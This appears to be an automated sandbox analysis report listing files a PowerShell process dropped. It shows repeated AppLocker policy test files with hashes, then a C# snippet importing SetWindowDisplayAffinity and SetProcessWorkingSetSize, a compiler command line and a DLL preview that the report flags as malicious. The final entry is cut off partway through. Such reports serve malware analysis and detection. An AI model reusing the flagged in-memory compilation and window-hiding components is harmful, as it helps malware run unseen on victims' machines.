                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c23vphnm.stg.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnkfy32o.o00.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpxxazqk.fb5.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgmfxwoq.oel.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktvrubje.e1f.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llzjeqzh.45i.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwanv1qe.gzr.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4gfv15j.5jy.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omyz01eo.jb5.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1x5eytv.0os.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0vuggof.5yv.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgnnbyvq.y45.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sicc22lf.s4a.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqpbezwp.vd0.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txkik0ll.eid.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wel1giry.dub.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdgq2muf.tua.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwvos2f5.ckn.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjjhssde.dwh.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgaifbew.1vy.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            File Type:MSVC .res
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):652
                                                                                                                            Entropy (8bit):3.1121485917832956
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCOak7YnqqJPPN5Dlq5J:+RI+ycuZhN/akSRPNnqX
                                                                                                                            MD5:D2AA2B50AB2F23E7A343C4AF7AEEF1F5
                                                                                                                            SHA1:95BD9083F73746EA2D32013EC58BCF9D38C6F180
                                                                                                                            SHA-256:7BAD4DDC23A193DB3DE2C939B2D233E434911852ADE7217333D02B49CC40DA00
                                                                                                                            SHA-512:11B817CF1E4820C7210C174A21D70CB2B774964B77F9860D7BBAC3AD9D4B39AAB657A494BFFBE66CE4F13ED2AE5E8C52BB95FF6A295C0A32018E04745C406823
                                                                                                                            Malicious:false
                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.m.w.k.p.c.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.1.m.w.k.p.c.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                            C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.0.cs

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):296
                                                                                                                            Entropy (8bit):4.932589529439335
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:V/DssSuVY/so68SRltRknYDV/D7JNo68SRL8C9KJwI0q:V/D9PY/RElHt5fJqEL88K7p
                                                                                                                            MD5:32E8AF8C0F84A8BB4647574F7D67F717
                                                                                                                            SHA1:875D56BC2A5D859C49E9715DDE093395689CD62F
                                                                                                                            SHA-256:6E0CCA3BBA43EBD5456B392D1B69740A3778B8A9FA86DAD6209C3FBE32335E7A
                                                                                                                            SHA-512:9A0362AC5BCE40E06761AA7C9858FEED03F9883BDF7ACC0546FA3F0439EFAC72C211073A23F49A329056467542E09210B9F55652214390D33384244B6C645414
                                                                                                                            Malicious:false
                                                                                                                            Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport("kernel32.dll")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }

                                                                                                                            C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):371
                                                                                                                            Entropy (8bit):5.261657896126073
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fdsZaWsKzxs7+AEszICHhJ23fdsZa5:p37Lvkmb6Ki1sZhsKWZEv1sZhsv
                                                                                                                            MD5:B32149F5055F75FD4592DC1A503CD9D9
                                                                                                                            SHA1:2733EE2828250834FE076E6FF814A1EAC5DC0312
                                                                                                                            SHA-256:586227209693114EEB0A6FCC833F110FDCD242BC0DAB69AA2367A9D2AFF0391D
                                                                                                                            SHA-512:690C726E1CED92064B2ECBA1995E53765FDF730D0C915E0EAFB3331727542917CDE069E3FB3EDD3C5444D390E8526508615918720DF2798632D7822FEFB22B1E
                                                                                                                            Malicious:true
                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.0.cs"

                                                                                                                            C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3072
                                                                                                                            Entropy (8bit):2.922647943849408
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:etGS95GIY/vlqu8NMHkghD9xHyKtkZfbbrdoVWI+ycuZhN/akSRPNnq:6OIil0NKkgb9y9Jbbrdl1ul/a3jq
                                                                                                                            MD5:BC9F1498039E5EE58D0AEBD0EE740F22
                                                                                                                            SHA1:A37D20BB4C97761031C107FB1231E629FBD6ED6E
                                                                                                                            SHA-256:48FB462B870285FC7264825DB563DD915B0174ED3A960E1FB05D23CD101834CE
                                                                                                                            SHA-512:D79FE3611A895BA51D7A9291763565BEFB29A9D359B46F2315C2564E9AD06D767E61BE6045E41E301402AFC49700A6569786793B00F74167B8E8FB3EB83539A3
                                                                                                                            Malicious:true
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..g...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...0...#~......<...#Strings............#US.........#GUID.......P...#Blob...........G.........%3............................................................-.&...................................................... 4............ M.....P ......f.........l.....q.....|...............f.....f...!.f. ...f.......%.......".-.....4.......M.....................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.out

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):872
                                                                                                                            Entropy (8bit):5.321575188428285
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:KOId3ka6KiuZhsrEvuZhsWKax5DqBVKVrdFAMBJTH:xkka6LuHsrEvuHsWK2DcVKdBJj
                                                                                                                            MD5:47026768BF430EE2C82C72F44C9D8441
                                                                                                                            SHA1:C617A4D3528D2BC6324E0D120FAF7364E81CFE55
